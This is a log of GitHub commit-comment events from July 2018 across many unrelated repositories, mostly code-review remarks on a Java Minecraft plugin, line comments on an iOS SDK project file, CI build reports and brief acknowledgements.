{"id":"7985987222","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29757255,"position":null,"line":null,"path":null,"commit_id":"46c53490a968256ba5fad01831705cf898cf026f","created_at":"2018-07-18T23:21:38Z","updated_at":"2018-07-18T23:21:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-18T23:21:38Z"}
{"id":"7985989651","type":"CommitCommentEvent","actor":{"login":"MatMoul"},"repo":{"name":"MatMoul/archfi"},"payload":{"comment":{"id":29757266,"position":null,"line":null,"path":null,"commit_id":"e9ef25986720be4355b887a91b18728e20147aa1","created_at":"2018-07-18T23:22:27Z","updated_at":"2018-07-18T23:22:27Z","author_association":"OWNER","body":"Not sure what's your problem, normaly if you use `wget archfi.sf.net/archfi` you get the last version (just tested now)...\r\n\r\nFor the GPG problem, try to use an other mirror"}},"created_at":"2018-07-18T23:22:27Z"}
{"id":"7985992195","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757268,"position":4,"line":1479,"path":"Adjust.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:23:22Z","updated_at":"2018-07-18T23:23:22Z","author_association":"NONE","body":"-\t\t\t\tLastUpgradeCheck = 0900;"}},"created_at":"2018-07-18T23:23:22Z"}
{"id":"7985992929","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29757271,"position":null,"line":null,"path":null,"commit_id":"728e5d461d4f9d35fc47057f2a14cefda9aef156","created_at":"2018-07-18T23:23:37Z","updated_at":"2018-07-18T23:23:37Z","author_association":"OWNER","body":"@rachmadaniHaryono please review this change."}},"created_at":"2018-07-18T23:23:37Z"}
{"id":"7986009912","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757322,"position":110,"line":110,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:29:31Z","updated_at":"2018-07-18T23:29:31Z","author_association":"OWNER","body":"Wouldnt it make sense to generate those here if they dont exist?"}},"created_at":"2018-07-18T23:29:31Z"}
{"id":"7986011624","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757330,"position":5,"line":369,"path":"AdjustTests/AdjustTestApp/AdjustTestApp.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:30:07Z","updated_at":"2018-07-18T23:30:07Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:30:07Z"}
{"id":"7986012813","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29757335,"position":null,"line":null,"path":null,"commit_id":"f83d4864133e8ae73363d349f9fd144523a4a426","created_at":"2018-07-18T23:30:28Z","updated_at":"2018-07-18T23:30:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-422](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-422).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-422-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T23:30:28Z"}
{"id":"7986013659","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757339,"position":144,"line":144,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:30:44Z","updated_at":"2018-07-18T23:30:44Z","author_association":"OWNER","body":"With a plugin like this you can never be 100 % sure that there isnt some way to cheat with it. It'd probably be a good idea to log all item enchantments that are applied."}},"created_at":"2018-07-18T23:30:44Z"}
{"id":"7986014143","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757341,"position":13,"line":503,"path":"AdjustTests/AdjustTestApp/AdjustTestApp.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:30:54Z","updated_at":"2018-07-18T23:30:54Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:30:54Z"}
{"id":"7986015033","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757345,"position":21,"line":511,"path":"AdjustTests/AdjustTestApp/AdjustTestApp.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:31:11Z","updated_at":"2018-07-18T23:31:11Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:31:11Z"}
{"id":"7986015648","type":"CommitCommentEvent","actor":{"login":"ErickWalker510"},"repo":{"name":"ErickWalker510/unity_androird_course"},"payload":{"comment":{"id":29757349,"position":null,"line":null,"path":null,"commit_id":"1c7d3b1e1ece0495395784fa13ae8e7ea900221f","created_at":"2018-07-18T23:31:24Z","updated_at":"2018-07-18T23:31:24Z","author_association":"OWNER","body":"menos mal.."}},"created_at":"2018-07-18T23:31:24Z"}
{"id":"7986015990","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757352,"position":29,"line":560,"path":"AdjustTests/AdjustTestApp/AdjustTestApp.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:31:30Z","updated_at":"2018-07-18T23:31:30Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:31:30Z"}
{"id":"7986016462","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757353,"position":37,"line":568,"path":"AdjustTests/AdjustTestApp/AdjustTestApp.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:31:38Z","updated_at":"2018-07-18T23:31:38Z","author_association":"NONE","body":"+"}},"created_at":"2018-07-18T23:31:38Z"}
{"id":"7986016928","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757354,"position":143,"line":143,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:31:47Z","updated_at":"2018-07-18T23:31:47Z","author_association":"OWNER","body":"Just a side note in case you arent aware: EventPriority.HIGHEST gets executed last."}},"created_at":"2018-07-18T23:31:47Z"}
{"id":"7986019637","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757361,"position":40,"line":40,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:32:40Z","updated_at":"2018-07-18T23:32:40Z","author_association":"OWNER","body":"This kinda comments (same for the other methods in this class) should just be javadoc, that way it shows up in IDE previews, documentation etc."}},"created_at":"2018-07-18T23:32:40Z"}
{"id":"7986019709","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757363,"position":4,"line":171,"path":"AdjustTests/AdjustTestLibrary/AdjustTestLibrary.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:32:42Z","updated_at":"2018-07-18T23:32:42Z","author_association":"NONE","body":"171"}},"created_at":"2018-07-18T23:32:42Z"}
{"id":"7986020767","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757369,"position":5,"line":171,"path":"AdjustTests/AdjustTestLibrary/AdjustTestLibrary.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:33:03Z","updated_at":"2018-07-18T23:33:03Z","author_association":"NONE","body":"171"}},"created_at":"2018-07-18T23:33:03Z"}
{"id":"7986022571","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757376,"position":13,"line":294,"path":"AdjustTests/AdjustTestLibrary/AdjustTestLibrary.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:33:39Z","updated_at":"2018-07-18T23:33:39Z","author_association":"NONE","body":"294"}},"created_at":"2018-07-18T23:33:39Z"}
{"id":"7986024733","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757380,"position":29,"line":351,"path":"AdjustTests/AdjustTestLibrary/AdjustTestLibrary.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:34:23Z","updated_at":"2018-07-18T23:34:23Z","author_association":"NONE","body":"351"}},"created_at":"2018-07-18T23:34:23Z"}
{"id":"7986025075","type":"CommitCommentEvent","actor":{"login":"dchiu911"},"repo":{"name":"AlineTalhouk/diceR"},"payload":{"comment":{"id":29757382,"position":null,"line":null,"path":null,"commit_id":"8d122cb9c4be4c14973f53bc26cc8ebd5656b70b","created_at":"2018-07-18T23:34:29Z","updated_at":"2018-07-18T23:34:29Z","author_association":"COLLABORATOR","body":"spData --> classInt --> questionr --> klaR"}},"created_at":"2018-07-18T23:34:29Z"}
{"id":"7986025428","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"adjust/ios_sdk"},"payload":{"comment":{"id":29757384,"position":37,"line":359,"path":"AdjustTests/AdjustTestLibrary/AdjustTestLibrary.xcodeproj/project.pbxproj","commit_id":"cfd54f68761d42a7312a088bba959797560eb3f7","created_at":"2018-07-18T23:34:37Z","updated_at":"2018-07-18T23:34:37Z","author_association":"NONE","body":"359"}},"created_at":"2018-07-18T23:34:37Z"}
{"id":"7986025803","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29757385,"position":4,"line":4,"path":"src/component/Home.js","commit_id":"6137a3a2dd148b29428b29fabfec2c4e6685661e","created_at":"2018-07-18T23:34:44Z","updated_at":"2018-07-18T23:34:44Z","author_association":"MEMBER","body":"change to Recipe :)"}},"created_at":"2018-07-18T23:34:44Z"}
{"id":"7986032789","type":"CommitCommentEvent","actor":{"login":"cdra0624"},"repo":{"name":"tigerscave/sono-go-dojo"},"payload":{"comment":{"id":29757402,"position":null,"line":null,"path":null,"commit_id":"3b3c67d76989f6648cbd58407521a2846e55ece0","created_at":"2018-07-18T23:37:03Z","updated_at":"2018-07-18T23:37:03Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-18T23:37:03Z"}
{"id":"7986034269","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29757404,"position":49,"line":16,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T23:37:34Z","updated_at":"2018-07-18T23:37:34Z","author_association":"NONE","body":"Раз ты уже привел к отсортированному массиву, то дальше следует использовать уже значения из него. В коде должно быть постоянство. В противном случае приходится при чтении кода каждый раз менять контекст и вспоминать, что в этой переменной хранится. Лучше уж - отсортировали и забыли."}},"created_at":"2018-07-18T23:37:34Z"}
{"id":"7986035207","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757406,"position":65,"line":65,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:37:52Z","updated_at":"2018-07-18T23:37:52Z","author_association":"OWNER","body":"It'd functionally be the same, but faster to do `(0.85f + Random.randomFloat() * 0.3)` here"}},"created_at":"2018-07-18T23:37:52Z"}
{"id":"7986035212","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757407,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-18T23:37:52Z","updated_at":"2018-07-18T23:37:52Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T23:37:52Z"}
{"id":"7986032498","type":"CommitCommentEvent","actor":{"login":"developer-2000"},"repo":{"name":"developer-2000/Symfony3.0.0"},"payload":{"comment":{"id":29757400,"position":null,"line":null,"path":null,"commit_id":"e67ea449a84bd5a45d8121b47c3e213f17d69348","created_at":"2018-07-18T23:36:57Z","updated_at":"2018-07-18T23:36:57Z","author_association":"OWNER","body":"norm"}},"created_at":"2018-07-18T23:36:57Z"}
{"id":"7986037834","type":"CommitCommentEvent","actor":{"login":"developer-2000"},"repo":{"name":"developer-2000/Symfony3.0.0"},"payload":{"comment":{"id":29757418,"position":5,"line":4,"path":"README.md","commit_id":"e67ea449a84bd5a45d8121b47c3e213f17d69348","created_at":"2018-07-18T23:38:45Z","updated_at":"2018-07-18T23:38:45Z","author_association":"OWNER","body":"sdfgdfg"}},"created_at":"2018-07-18T23:38:45Z"}
{"id":"7986039461","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757421,"position":62,"line":62,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:39:20Z","updated_at":"2018-07-18T23:39:20Z","author_association":"OWNER","body":"I dont really see why you are using wrapper classes here. This would make sense if it was possible for your variable to have a value of null, but thats never the case here so you should probably just be using int and float instead"}},"created_at":"2018-07-18T23:39:20Z"}
{"id":"7986041385","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29757429,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-18T23:40:03Z","updated_at":"2018-07-18T23:40:03Z","author_association":"OWNER","body":"@ilovezfs could you please submit pdd to homebrew?"}},"created_at":"2018-07-18T23:40:03Z"}
{"id":"7986044991","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757433,"position":11,"line":11,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentVerbose.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:41:17Z","updated_at":"2018-07-18T23:41:17Z","author_association":"OWNER","body":"Your plugin would have fantastic use cases far past what you are intending right now if you made this configurable instead of a hardcoded enum."}},"created_at":"2018-07-18T23:41:17Z"}
{"id":"7986046197","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757436,"position":257,"line":257,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentVerbose.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:41:44Z","updated_at":"2018-07-18T23:41:44Z","author_association":"OWNER","body":"Again no reason to use wrapper classes for all these methods"}},"created_at":"2018-07-18T23:41:44Z"}
{"id":"7986046220","type":"CommitCommentEvent","actor":{"login":"nganivet"},"repo":{"name":"cividesk/com.cividesk.email.sparkpost"},"payload":{"comment":{"id":29757437,"position":null,"line":null,"path":null,"commit_id":"69a0bdb17bb520334da7f472a2d7670b44da8071","created_at":"2018-07-18T23:41:44Z","updated_at":"2018-07-18T23:41:44Z","author_association":"CONTRIBUTOR","body":"@sunilpawar can you please merge this in the upcoming release? Thanks."}},"created_at":"2018-07-18T23:41:44Z"}
{"id":"7986047351","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757441,"position":309,"line":309,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentVerbose.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:42:09Z","updated_at":"2018-07-18T23:42:09Z","author_association":"OWNER","body":"Good call to overwrite that"}},"created_at":"2018-07-18T23:42:09Z"}
{"id":"7986051791","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"danielrob/js-emoji-projects"},"payload":{"comment":{"id":29757461,"position":null,"line":null,"path":null,"commit_id":"cb0ff62bf44c02e0f1e89a13f191ed27ae920029","created_at":"2018-07-18T23:43:45Z","updated_at":"2018-07-18T23:43:45Z","author_association":"NONE","body":"Thanks! 🐶"}},"created_at":"2018-07-18T23:43:45Z"}
{"id":"7986052377","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757465,"position":20,"line":20,"path":"src/main/java/com/github/cranite/MoreEnchantables/ItemUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:43:59Z","updated_at":"2018-07-18T23:43:59Z","author_association":"OWNER","body":"Could also make this configurable"}},"created_at":"2018-07-18T23:43:59Z"}
{"id":"7986053835","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757474,"position":82,"line":82,"path":"src/main/java/com/github/cranite/MoreEnchantables/ItemUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:44:28Z","updated_at":"2018-07-18T23:44:28Z","author_association":"OWNER","body":"make this javadoc, same below"}},"created_at":"2018-07-18T23:44:28Z"}
{"id":"7986054567","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757480,"position":100,"line":100,"path":"src/main/java/com/github/cranite/MoreEnchantables/ItemUtility.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:44:45Z","updated_at":"2018-07-18T23:44:45Z","author_association":"OWNER","body":"fancy"}},"created_at":"2018-07-18T23:44:45Z"}
{"id":"7986055381","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757486,"position":3,"line":3,"path":"src/main/java/com/github/cranite/MoreEnchantables/Misc/IntRange.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:45:02Z","updated_at":"2018-07-18T23:45:02Z","author_association":"OWNER","body":"java sucks for having to do stuff like this"}},"created_at":"2018-07-18T23:45:02Z"}
{"id":"7986057409","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757495,"position":5,"line":5,"path":"src/main/java/com/github/cranite/MoreEnchantables/Misc/Random.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:45:41Z","updated_at":"2018-07-18T23:45:41Z","author_association":"OWNER","body":"This class seems really unncessary. You should probably just be using java.util.Random whereever you are using it."}},"created_at":"2018-07-18T23:45:41Z"}
{"id":"7986059383","type":"CommitCommentEvent","actor":{"login":"Glowstoner"},"repo":{"name":"FireBlade-Serv/FireAPI"},"payload":{"comment":{"id":29757497,"position":null,"line":null,"path":null,"commit_id":"96a4a1e1f8b9babcb7b9058dd2b8a5cef71d2872","created_at":"2018-07-18T23:46:22Z","updated_at":"2018-07-18T23:46:22Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Module API Spy : Bug FireCalendar -> NullPointerException](https://trello.com/c/oEH3Im94/26-module-api-spy-bug-firecalendar-nullpointerexception)"}},"created_at":"2018-07-18T23:46:22Z"}
{"id":"7986062872","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757503,"position":37,"line":37,"path":"src/main/java/com/github/cranite/MoreEnchantables/MoreEnchantablesPlugin.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:47:38Z","updated_at":"2018-07-18T23:47:38Z","author_association":"OWNER","body":"You shouldn't be using stdout. Bukkit gives you a logger which automates a lot of nice things like prefixing a timestamp, printing it to the server logfile etc.. Use that instead"}},"created_at":"2018-07-18T23:47:38Z"}
{"id":"7986067337","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757516,"position":2,"line":2,"path":"src/main/resources/META-INF/MANIFEST.MF","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:49:18Z","updated_at":"2018-07-18T23:49:18Z","author_association":"OWNER","body":"You can do this through Maven (and probably should be, because this is the kind of stuff you have maven for).\r\n\r\n\r\nhttp://www.avajava.com/tutorials/lessons/how-do-i-specify-a-main-class-in-the-manifest-of-my-generated-jar-file.html"}},"created_at":"2018-07-18T23:49:18Z"}
{"id":"7986069134","type":"CommitCommentEvent","actor":{"login":"roppenheimer"},"repo":{"name":"roppenheimer/AAPSv2draft"},"payload":{"comment":{"id":29757522,"position":null,"line":null,"path":null,"commit_id":"42890211459e1ffcb3825ac637e338a6b2881a1e","created_at":"2018-07-18T23:49:59Z","updated_at":"2018-07-18T23:49:59Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-18T23:49:59Z"}
{"id":"7986070444","type":"CommitCommentEvent","actor":{"login":"TitanSnow"},"repo":{"name":"luogu-dev/markdown-palettes"},"payload":{"comment":{"id":29757524,"position":null,"line":null,"path":null,"commit_id":"49ef374fec32ded78129f66250c2904eb6a20999","created_at":"2018-07-18T23:50:26Z","updated_at":"2018-07-18T23:50:26Z","author_association":"MEMBER","body":":anger: What are you doing?… You just need to upload these build output to npm, not GitHub! Git is well-known not good at dealing binary files."}},"created_at":"2018-07-18T23:50:26Z"}
{"id":"7986073720","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29757529,"position":1,"line":1,"path":"jitpack.yml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-18T23:51:38Z","updated_at":"2018-07-18T23:51:38Z","author_association":"OWNER","body":"Should be using our jenkins and not jitpack. Imo its just clutter."}},"created_at":"2018-07-18T23:51:38Z"}
{"id":"7986074076","type":"CommitCommentEvent","actor":{"login":"TitanSnow"},"repo":{"name":"luogu-dev/markdown-palettes"},"payload":{"comment":{"id":29757532,"position":null,"line":null,"path":null,"commit_id":"49ef374fec32ded78129f66250c2904eb6a20999","created_at":"2018-07-18T23:51:46Z","updated_at":"2018-07-18T23:51:46Z","author_association":"MEMBER","body":"In this way I'll waste more time on my slow network connection to GitHub!"}},"created_at":"2018-07-18T23:51:46Z"}
{"id":"7986074205","type":"CommitCommentEvent","actor":{"login":"NathanSweet"},"repo":{"name":"libgdx/libgdx"},"payload":{"comment":{"id":29757534,"position":26,"line":248,"path":"extensions/gdx-tools/src/com/badlogic/gdx/tools/texturepacker/MaxRectsPacker.java","commit_id":"59c37a0ab66dcb938d1a266158e4e0d4929e575e","created_at":"2018-07-18T23:51:48Z","updated_at":"2018-07-18T23:51:48Z","author_association":"MEMBER","body":"Gah, thanks!"}},"created_at":"2018-07-18T23:51:48Z"}
{"id":"7986074969","type":"CommitCommentEvent","actor":{"login":"kwonma"},"repo":{"name":"kwonma/PlantCam-Sketches"},"payload":{"comment":{"id":29757537,"position":null,"line":null,"path":null,"commit_id":"2170925ab32e2552fce762b2b1f8a926e27206be","created_at":"2018-07-18T23:52:07Z","updated_at":"2018-07-18T23:52:07Z","author_association":"OWNER","body":"removed library functions to save space"}},"created_at":"2018-07-18T23:52:07Z"}
{"id":"7986076230","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"driver733/VKUploader"},"payload":{"comment":{"id":29757539,"position":null,"line":null,"path":null,"commit_id":"8c25d4c6daf682de437a10094c2b11490f815d81","created_at":"2018-07-18T23:52:34Z","updated_at":"2018-07-18T23:52:34Z","author_association":"COLLABORATOR","body":"Puzzle `40-2426a3bf` discovered in   [`src/test/java/com/driver733/vkmusicuploader/wallpost/attachment/message/ID3v1AnnotatedSafeTest.java`](  https://github.com/driver733/VKUploader/blob/master/src/test/java/com/driver733/vkmusicuploader/wallpost/attachment/message/ID3v1AnnotatedSafeTest.java)   and submitted as #277. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-18T23:52:34Z"}
{"id":"7986076800","type":"CommitCommentEvent","actor":{"login":"jmroot"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29757541,"position":4,"line":233,"path":"python/py-graveyard/Portfile","commit_id":"be83b67a0fa270989f2ac4d862aefa3d6f411c89","created_at":"2018-07-18T23:52:47Z","updated_at":"2018-07-18T23:52:47Z","author_association":"MEMBER","body":"People still need to use EOL versions for various reasons. I can't find the discussion right now, but the relevant maintainers decided that as long as we have some pythonXY in the ports tree, we should also have pyXY-{setuptools,pip,virtualenv}."}},"created_at":"2018-07-18T23:52:47Z"}
{"id":"7986077090","type":"CommitCommentEvent","actor":{"login":"bradmac"},"repo":{"name":"Kademi/kademi-dev"},"payload":{"comment":{"id":29757543,"position":13,"line":79,"path":"src/main/marketplace/apps/KForums/APP-INF/app.js","commit_id":"ea7c3b07a3a77648f14f1ec858a72201f88ec692","created_at":"2018-07-18T23:52:55Z","updated_at":"2018-07-18T23:52:55Z","author_association":"CONTRIBUTOR","body":"Please add controller logic to check if the user deleting is allowed to, and return appropriate JsonStatus if not"}},"created_at":"2018-07-18T23:52:55Z"}
{"id":"7986079285","type":"CommitCommentEvent","actor":{"login":"caijiankai"},"repo":{"name":"caijiankai/123"},"payload":{"comment":{"id":29757556,"position":null,"line":null,"path":null,"commit_id":"83be3e7cfac96dd2e726247b6ccf6e9e850ff6dc","created_at":"2018-07-18T23:53:45Z","updated_at":"2018-07-18T23:53:45Z","author_association":"OWNER","body":"mybatis的热插拔"}},"created_at":"2018-07-18T23:53:45Z"}
{"id":"7986079315","type":"CommitCommentEvent","actor":{"login":"fmuellner"},"repo":{"name":"flathub/org.gnome.Polari"},"payload":{"comment":{"id":29757557,"position":null,"line":null,"path":null,"commit_id":"8ed9108bfe73f68d64b64f3dd31dd4ab6926bbec","created_at":"2018-07-18T23:53:46Z","updated_at":"2018-07-18T23:53:46Z","author_association":"COLLABORATOR","body":"bot, build"}},"created_at":"2018-07-18T23:53:46Z"}
{"id":"7986080682","type":"CommitCommentEvent","actor":{"login":"n8downs"},"repo":{"name":"twitter/twemoji"},"payload":{"comment":{"id":29757564,"position":null,"line":null,"path":null,"commit_id":"3af035945079451c63d2c8b14b81dfe195c94c91","created_at":"2018-07-18T23:54:14Z","updated_at":"2018-07-18T23:54:14Z","author_association":"CONTRIBUTOR","body":"@WebReflection It looks like this commit makes the tests error out in Travis, though they seem to work for me locally. I tried upgrading Travis to Node 8 (to match my local environment) to no avail. Unfortunately, wru isn't giving helpful output about the error. Mind taking a look?"}},"created_at":"2018-07-18T23:54:14Z"}
{"id":"7986082132","type":"CommitCommentEvent","actor":{"login":"cdra0624"},"repo":{"name":"tigerscave/rah-go-dojo"},"payload":{"comment":{"id":29757571,"position":null,"line":null,"path":null,"commit_id":"cfcaf3b733a3d49db6a1c31987567906ff0f7a20","created_at":"2018-07-18T23:54:47Z","updated_at":"2018-07-18T23:54:47Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-18T23:54:47Z"}
